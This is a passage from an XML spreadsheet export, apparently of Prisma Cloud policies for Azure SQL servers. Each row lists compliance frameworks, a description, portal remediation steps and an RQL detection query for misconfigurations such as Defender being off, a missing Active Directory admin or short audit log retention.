          <t>This policy identifies Azure SQL databases which have Defender setting set to Off. Azure Defender for SQL provides a new layer of security, which enables customers to detect and respond to potential threats as they occur by providing security alerts on anomalous activities. Users will receive an alert upon suspicious database activities, potential vulnerabilities, SQL injection attacks, as well as anomalous database access patterns. Advanced threat protection alerts provide details of suspicious activity and recommend action on how to investigate and mitigate the threat.</t>
        </is>
      </c>
      <c r="X2421" t="inlineStr">
        <is>
          <t>If Azure Defender is enabled at server level it will also be applied to all the database, regardless of the database Azure Defender settings. It is recommended that you enable only server-level Azure Defender settings.
To enable auditing at server level:
1. Log in to the Azure Portal
2. Note down the reported SQL database and SQL server
3. Select 'SQL servers', Click on the SQL server instance you wanted to modify
4. Click on 'Microsoft Defender for Cloud' under 'Security'
5. Click on 'Enable Microsoft Defender for SQL'
It is recommended to avoid enabling Azure Defender in both server and database.
If you want to enable different storage account, email addresses for scan and alert notifications or 'Advanced Threat Protection types' for a specific database that differ from the rest of the databases on the server. Then to enable auditing at database level by:
1. Log in to the Azure Portal
2. Note down the reported SQL database
3. Select 'SQL databases', Click on the SQL database instance you wanted to modify
4. Click on 'Microsoft Defender for Cloud' under 'Security'
5. Click on 'Enable Microsoft Defender for SQL'</t>
        </is>
      </c>
      <c r="Y2421" t="inlineStr"/>
      <c r="Z2421" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-sql-db-list' AND json.rule = sqlDatabase.properties.status equals Online and (securityAlertPolicy.properties.state equals Disabled or securityAlertPolicy does not exist or securityAlertPolicy.[*] isEmpty) as X; config from cloud.resource where api.name = 'azure-sql-server-list' AND json.rule = ['sqlServer'].['properties.state'] equals Ready and (serverSecurityAlertPolicy.properties.state equals Disabled or serverSecurityAlertPolicy does not exist or serverSecurityAlertPolicy isEmpty) as Y; filter "$.X.blobAuditPolicy.id contains $.Y.sqlServer.name"; show X;</t>
        </is>
      </c>
      <c r="AA2421" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2421" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2421" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-101</t>
        </is>
      </c>
      <c r="AD2421" t="b">
        <v>1</v>
      </c>
      <c r="AE2421" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2421" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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1" t="inlineStr">
        <is>
          <t>8f7eee48-dffb-4f18-9207-8ea48680b0e2</t>
        </is>
      </c>
      <c r="AI2421" t="inlineStr">
        <is>
          <t>719834bf-d296-4adf-973a-9c74b4bb24c6</t>
        </is>
      </c>
      <c r="AJ2421" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2421" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2422">
      <c r="A2422" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, CIS v1.2.0 (Azure), CSA CCM v3.0.1, CIS v1.1 (Azure), NIST CSF, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CSA CCM v3.0.1, CDC NIST 800-53 Rev4, kfirdaus AWS Account-CS, CIS v1.3.0 (Azure), NIST 800-53 Rev4, CSA CCM v3.0.1, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v3.0.1, APRA (CPS 234) Information Security, CSA CCM v3.0.1, CSA CCM v3.0.1, SOC 2, CDC NIST 800-53 Rev4, CIS v1.3.1 (Azure), NIST SP 800-172, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), HITRUST CSF v9.3 [Deprecated], CIS v1.4.0 (Azure), NIST 800-53 Rev4, Copy of Azure Security Benchmark (v3), CyberSecurity Law of the People's Republic of China, MTSBv2_Azure, HITRUST CSF v9.3 [Deprecated], CIS v1.5.0 (Azure) - Level 1, NIST 800-53 Rev4, Australian Energy Sector Cyber Security Framework (AESCSF), SOC 2, ISO 27001:2013, CSA CCM v3.0.1, CIS Controls v8, CSA CCM v3.0.1, CSA CCM v3.0.1, testazure, Sarbanes Oxley Act (SOX), Sarbanes Oxley Act (SOX), ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), Copy of CIS Controls v8, ISO 27001:2013, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], SOC 2, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, CSA CCM v3.0.1, APRA (CPS 234) Information Security, testazure, SOC 2, CSA CCM v3.0.1, CIS v2.0.0 (Azure) Level 1, CSA CCM v3.0.1, Azure Security Benchmark (v3), Copy of CIS v1.2.0 (Azure), CSA CCM v3.0.1, Azure Security Benchmark (v2), Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, CSA CCM v3.0.1, CIS v1.1 (Azure), CSA CCM v3.0.1, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, CDC NIST 800-53 Rev4, ACSC Information Security Manual (ISM), CSA CCM v3.0.1, HITRUST CSF v9.3 [Deprecated], ISO/IEC 27001:2022, NIST SP 800-171 Revision 2, PCI DSS v3.2.1, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, Azure Security Benchmark (v2)</t>
        </is>
      </c>
      <c r="B2422" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2422" s="2" t="inlineStr"/>
      <c r="D2422" t="inlineStr"/>
      <c r="E2422" t="inlineStr"/>
      <c r="F2422" t="inlineStr"/>
      <c r="G2422" t="b">
        <v>0</v>
      </c>
      <c r="H24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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2422" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2422" t="inlineStr">
        <is>
          <t>Copy of Azure SQL server not configured with Active Directory admin authentication</t>
        </is>
      </c>
      <c r="L2422" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2422" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2422" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2422" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2422" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2422" t="inlineStr">
        <is>
          <t>Privileged Access (PA)</t>
        </is>
      </c>
      <c r="R2422" t="inlineStr">
        <is>
          <t>PA-1</t>
        </is>
      </c>
      <c r="S2422" t="inlineStr"/>
      <c r="T2422" t="b">
        <v>0</v>
      </c>
      <c r="U2422" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2422" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2422" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL servers that are not configured with Active Directory admin authentication. Azure Active Directory authentication is a mechanism of connecting to Microsoft Azure SQL Database and SQL Data Warehouse by using identities in Azure Active Directory (Azure AD). With Azure AD authentication, you can centrally manage the identities of database users and other Microsoft services in one central location. It is recommended to configure SQL servers with Active Directory admin authentication.</t>
        </is>
      </c>
      <c r="X2422" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Navigate SQL servers dashboard
3. Select reported each SQL server
4. Click on Azure Active Directory (under 'Settings')
5. Click on 'Set admin'
6. Select an Azure Active Directory from available options
7. Click on Select
8. Click on Save</t>
        </is>
      </c>
      <c r="Y2422" t="inlineStr"/>
      <c r="Z2422" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule = serverAdmins does not exist or serverAdmins[*] size equals 0 or (serverAdmins[*].properties.administratorType exists and serverAdmins[*].properties.administratorType does not equal ActiveDirectory and serverAdmins[*].properties.login is not empty)</t>
        </is>
      </c>
      <c r="AA2422" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2422" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2422" t="inlineStr"/>
      <c r="AD2422" t="b">
        <v>0</v>
      </c>
      <c r="AE2422" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2422" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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2" t="inlineStr">
        <is>
          <t>4c856617-aabe-4844-825e-3b874aaf2417</t>
        </is>
      </c>
      <c r="AI2422" t="inlineStr">
        <is>
          <t>43903df4-2770-4aec-a81a-ae066703d9aa</t>
        </is>
      </c>
      <c r="AJ2422" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2422" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2423">
      <c r="A2423" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, ISO/IEC 27002:2013, NIST CSF, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, PCI DSS v3.2.1, ISO/IEC 27002:2013, CIS v1.3.0 (Azure), Azure Security Benchmark (v3), ISO/IEC 27017:2015, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Azure Security Benchmark (v2), Copy of CIS v1.2.0 (Azure), Azure Security Benchmark (v2), ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, Copy of Azure Security Benchmark (v3), NIST CSF, NIST CSF, Azure Security Benchmark (v2), HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CIS v1.3.1 (Azure), ISO/IEC 27002:2013, MTSBv2_Azure, ISO/IEC 27002:2013, NIST CSF, CSA CCM v.4.0.1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, NIST SP 800-171 Revision 2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST SP 800-172, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, NIST CSF, NIST CSF, Azure Security Benchmark (v2), NIST CSF, Azure Security Benchmark (v3), ISO/IEC 27002:2013, NIST CSF, CIS v1.4.0 (Azure), CIS v1.2.0 (Azure), CSA CCM v.4.0.1, ISO/IEC 27018:2019, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2423" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2423" s="2" t="inlineStr"/>
      <c r="D2423" t="inlineStr"/>
      <c r="E2423" t="inlineStr"/>
      <c r="F2423" t="inlineStr"/>
      <c r="G2423" t="b">
        <v>0</v>
      </c>
      <c r="H24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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2423" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2423" t="inlineStr">
        <is>
          <t>Copy of Azure SQL Server ADS Vulnerability Assessment Periodic recurring scans is disabled</t>
        </is>
      </c>
      <c r="L2423" t="inlineStr"/>
      <c r="M2423" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2423" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2423" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2423" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2423" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R2423" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S2423" t="inlineStr"/>
      <c r="T2423" t="b">
        <v>0</v>
      </c>
      <c r="U2423" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2423" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2423" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL Server which has ADS Vulnerability Assessment Periodic recurring scans disabled. Advanced Data Security - Vulnerability Assessment 'Periodic recurring scans' schedules periodic vulnerability scanning for the SQL server and Databases. It is recommended to enable ADS - VA Periodic recurring scans which provides risk visibility based on updated known vulnerability signatures and best practices.</t>
        </is>
      </c>
      <c r="X2423" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Select 'SQL servers', and select the SQL server you need to modify
3. Click on 'Microsoft Defender for Cloud' under 'Security'
4. Click on '(Configure)' next to 'Microsoft Defender for SQL: Enabled at the server-level'
5. Set 'Periodic recurring scans' to 'ON' under 'VULNERABILITY ASSESSMENT SETTINGS'
6. 'Save' your changes</t>
        </is>
      </c>
      <c r="Y2423" t="inlineStr"/>
      <c r="Z2423" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule = vulnerabilityAssessments[*].properties.storageContainerPath exists and vulnerabilityAssessments[*].properties.recurringScans.isEnabled is false</t>
        </is>
      </c>
      <c r="AA2423" t="inlineStr">
        <is>
          <t>Mark Davis</t>
        </is>
      </c>
      <c r="AB2423" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2423" t="inlineStr"/>
      <c r="AD2423" t="b">
        <v>0</v>
      </c>
      <c r="AE2423" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2423" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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3" t="inlineStr">
        <is>
          <t>02c4d09a-bf58-4642-851b-3607491efa7a</t>
        </is>
      </c>
      <c r="AI2423" t="inlineStr">
        <is>
          <t>5c28d8a1-5f19-4914-a9bc-60e201d3939c</t>
        </is>
      </c>
      <c r="AJ2423" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2423" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2424">
      <c r="A2424" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CIS Controls v7.1, Copy of Azure Security Benchmark (v3), Sarbanes Oxley Act (SOX), CRI Profile v1.2.1, kashan ACSC Information Security Manual (ISM), jneytchev-fedramp-low, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO 27002:2022, ISO/IEC 27017:2015, TX-RAMP Level 2, MLPS 2.0 (Level 2), ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, PCI DSS v4.0, ISO/IEC 27002:2013, ITSG-33, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), CSA CCM v4.0.12, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, APRA (CPS 234) Information Security, NIST 800-53 Rev 5, ISO/IEC 27017:2015, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, CSA CCM v4.0.12, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev4, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, CyberSecurity Law of the People's Republic of China, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), CIS Controls v8, CIS v2.1.0 (Azure) Level 1, NIST CSF, Azure Security Benchmark (v3), CIS v1.1 (Azure), HITRUST v.9.4.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, PCI DSS v4.0, TX-RAMP Level 1, NIST SP 800-171 Revision 3, Fedramp (Moderate), CIS Controls v8.1, testazure, NIST 800-53 Rev 5, CIS v1.4.0 (Azure), ITSG-33, TX-RAMP Level 2, TX-RAMP Level 1, CIS v1.2.0 (Azure), NIST 800-53 Rev 5, Copy of CIS v1.2.0 (Azure), NIST SP 800-171 Revision 2, NIST CSF, kfirdaus AWS Account-CS, CyberSecurity Law of the People's Republic of China, TX-RAMP Level 2, CDC NIST 800-53 Rev4, CSA CCM v.4.0.1, DORA, CSA CCM v.4.0.1, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, MTSBv2_Azure, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Azure Security Benchmark (v2), PCI DSS v4.0, PIPEDA, SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, Fedramp (Low), NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, Copy of CIS Controls v8, RBI Baseline Cyber Security and Resilience Requirements, NIST SP 800-172, ITSG-33, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, CIS v2.0.0 (Azure) Level 1, CCPA 2018, Microsoft Cloud Security Benchmark v1, PCI DSS v4.0, test-luis, Brazilian Data Protection Law (LGPD), CIS v1.3.0 (Azure), DORA, ACSC Information Security Manual (ISM), CIS v1.5.0 (Azure) - Level 1, CIS v1.3.1 (Azure), NIST SP 800-171 Revision 3, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2424" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2424" s="2" t="inlineStr"/>
      <c r="D2424" t="inlineStr"/>
      <c r="E2424" t="inlineStr"/>
      <c r="F2424" t="inlineStr"/>
      <c r="G2424" t="b">
        <v>1</v>
      </c>
      <c r="H24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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2424" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2424" t="inlineStr">
        <is>
          <t>Azure SQL Server audit log retention is less than 91 days</t>
        </is>
      </c>
      <c r="L2424" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2424" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2424" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2424" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2424" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2424" t="inlineStr">
        <is>
          <t>01</t>
        </is>
      </c>
      <c r="R2424" t="inlineStr">
        <is>
          <t>test01-luis</t>
        </is>
      </c>
      <c r="S2424" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T2424" t="b">
        <v>0</v>
      </c>
      <c r="U2424" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2424" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2424" t="inlineStr">
        <is>
          <t>Audit Logs can help you find suspicious events, unusual activity, and trends. Auditing the SQL server, at the server-level, allows you to track all existing and newly created databases on the instance.
This policy identifies SQL servers which do not retain audit logs for more than 90 days. As a best practice, configure the audit logs retention time period to be greater than 90 days.</t>
        </is>
      </c>
      <c r="X2424" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Navigate to 'SQL servers' dashboard
3. Select the SQL server instance you want to modify
4. Select 'Auditing', and verify that 'Enable Azure SQL Auditing' is set
5. If Storage is selected, expand 'Advanced properties'
6. Set the Retention (days) setting is greater than 90 days or 0 for unlimited retention.
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2424" t="inlineStr"/>
      <c r="Z2424" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule = serverBlobAuditingPolicy.properties.state equal ignore case Enabled and serverBlobAuditingPolicy.properties.storageEndpoint is not empty and (serverBlobAuditingPolicy.properties.retentionDays does not equal 0 and serverBlobAuditingPolicy.properties.retentionDays &lt; 91)</t>
        </is>
      </c>
      <c r="AA2424" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2424" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2424" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-337</t>
        </is>
      </c>
      <c r="AD2424" t="b">
        <v>1</v>
      </c>
      <c r="AE2424" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2424" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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4" t="inlineStr">
        <is>
          <t>0ca00469-8223-4753-a9df-4add7c37725f</t>
        </is>
      </c>
      <c r="AI2424" t="inlineStr">
        <is>
          <t>60a5c729-cf6e-4371-901a-4335dbf0c9b8</t>
        </is>
      </c>
      <c r="AJ2424" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2424" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2425">
      <c r="A2425" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, CIS v1.2.0 (Azure), CSA CCM v3.0.1, CIS v1.1 (Azure), NIST CSF, APRA (CPS 234) Information Security, CSA CCM v3.0.1, Microsoft Cloud Security Benchmark v1, CIS v1.3.0 (Azure), NIST 800-53 Rev4, CSA CCM v3.0.1, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-171 Revision 3, CSA CCM v3.0.1, APRA (CPS 234) Information Security, CSA CCM v3.0.1, CSA CCM v3.0.1, RBI Baseline Cyber Security and Resilience Requirements, SOC 2, TX-RAMP Level 1, CIS v1.3.1 (Azure), NIST SP 800-172, TX-RAMP Level 2, HITRUST CSF v.11.2.0, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v9.3 [Deprecated], ITSG-33, CIS v1.4.0 (Azure), NIST 800-53 Rev4, CyberSecurity Law of the People's Republic of China, HITRUST CSF v9.3 [Deprecated], CIS v1.5.0 (Azure) - Level 1, Insurance Regulatory And Development Authority Of India, NIST 800-53 Rev4, Australian Energy Sector Cyber Security Framework (AESCSF), SOC 2, ISO 27001:2013, CSA CCM v3.0.1, CIS Controls v8, CSA CCM v3.0.1, CSA CCM v3.0.1, TX-RAMP Level 1, NIST SP 800-171 Revision 3, Sarbanes Oxley Act (SOX), Sarbanes Oxley Act (SOX), TX-RAMP Level 2, ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), ISO 27001:2013, HITRUST CSF v9.3 [Deprecated], NIST 800-53 Rev 5, ITSG-33, HITRUST CSF v9.3 [Deprecated], SOC 2, APRA (CPS 234) Information Security, ITSG-33, CSA CCM v3.0.1, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, SOC 2, CSA CCM v3.0.1, CIS v2.1.0 (Azure) Level 1, CIS v2.0.0 (Azure) Level 1, CSA CCM v3.0.1, Azure Security Benchmark (v3), CSA CCM v3.0.1, Azure Security Benchmark (v2), ITSG-33, ISO 27002:2022, CSA CCM v3.0.1, TX-RAMP Level 2, CIS v1.1 (Azure), CSA CCM v3.0.1, APRA (CPS 234) Information Security, CCPA 2018, ITSG-33, PIPEDA, CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, CSA CCM v3.0.1, HITRUST CSF v9.3 [Deprecated], ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST SP 800-171 Revision 2, PCI DSS v3.2.1, Brazilian Data Protection Law (LGPD), NIST 800-53 Rev 5, CIS Controls v8.1, Azure Security Benchmark (v2)</t>
        </is>
      </c>
      <c r="B2425" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2425" s="2" t="inlineStr"/>
      <c r="D2425" t="inlineStr"/>
      <c r="E2425" t="inlineStr"/>
      <c r="F2425" t="inlineStr"/>
      <c r="G2425" t="b">
        <v>1</v>
      </c>
      <c r="H24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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2425" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2425" t="inlineStr">
        <is>
          <t>Azure SQL server not configured with Active Directory admin authentication</t>
        </is>
      </c>
      <c r="L2425" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2425" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2425" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2425" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2425" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2425" t="inlineStr">
        <is>
          <t>Privileged Access (PA)</t>
        </is>
      </c>
      <c r="R2425" t="inlineStr">
        <is>
          <t>PA-1</t>
        </is>
      </c>
      <c r="S2425" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2425" t="b">
        <v>0</v>
      </c>
      <c r="U2425" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2425" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2425" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL servers that are not configured with Active Directory admin authentication. Azure Active Directory authentication is a mechanism of connecting to Microsoft Azure SQL Database and SQL Data Warehouse by using identities in Azure Active Directory (Azure AD). With Azure AD authentication, you can centrally manage the identities of database users and other Microsoft services in one central location. It is recommended to configure SQL servers with Active Directory admin authentication.</t>
        </is>
      </c>
      <c r="X2425" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Navigate SQL servers dashboard
3. Select reported each SQL server
4. Click on Azure Active Directory (under 'Settings')
5. Click on 'Set admin'
6. Select an Azure Active Directory from available options
7. Click on Select
8. Click on Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/azr-general-85
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/azr-general-85</t>
        </is>
      </c>
      <c r="Y2425" t="inlineStr"/>
      <c r="Z2425" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule = serverAdmins does not exist or serverAdmins[*] size equals 0 or (serverAdmins[*].properties.administratorType exists and serverAdmins[*].properties.administratorType does not equal ActiveDirectory and serverAdmins[*].properties.login is not empty)
{"category":"General","resourceTypes":["azurerm_mssql_server"]}</t>
        </is>
      </c>
      <c r="AA2425" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2425" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2425" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-138-CKV2_AZURE_27</t>
        </is>
      </c>
      <c r="AD2425" t="b">
        <v>1</v>
      </c>
      <c r="AE2425" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2425" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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5" t="inlineStr">
        <is>
          <t>4d2615bb-091e-48fd-87b7-77a277d7d2fd</t>
        </is>
      </c>
      <c r="AI2425" t="inlineStr">
        <is>
          <t>186ce6b6-15d4-409c-b864-7c62922ef198</t>
        </is>
      </c>
      <c r="AJ2425" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2425" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2426">
      <c r="A2426" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27001:2022, CSA CCM v.4.0.1, Fedramp (Moderate), CSA CCM v.4.0.1, HITRUST CSF v9.3 [Deprecated], jneytchev-fedramp-low, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Azure Security Benchmark (v2), CSA CCM v3.0.1, RBI Baseline Cyber Security and Resilience Requirements, FFIEC, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, kfirdaus AWS Account-CS, ISO 27002:2022, Insurance Regulatory And Development Authority Of India, CIS v1.1 (Azure), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27002:2013, ISO/IEC 27002:2013, MITRE ATT&amp;CK v12, CIS v2.0.0 (Azure) Level 1, MITRE ATT&amp;CK v8.2 [Deprecated], CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, NIST CSF, CSA CCM v.4.0.1, CSA CCM v3.0.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, 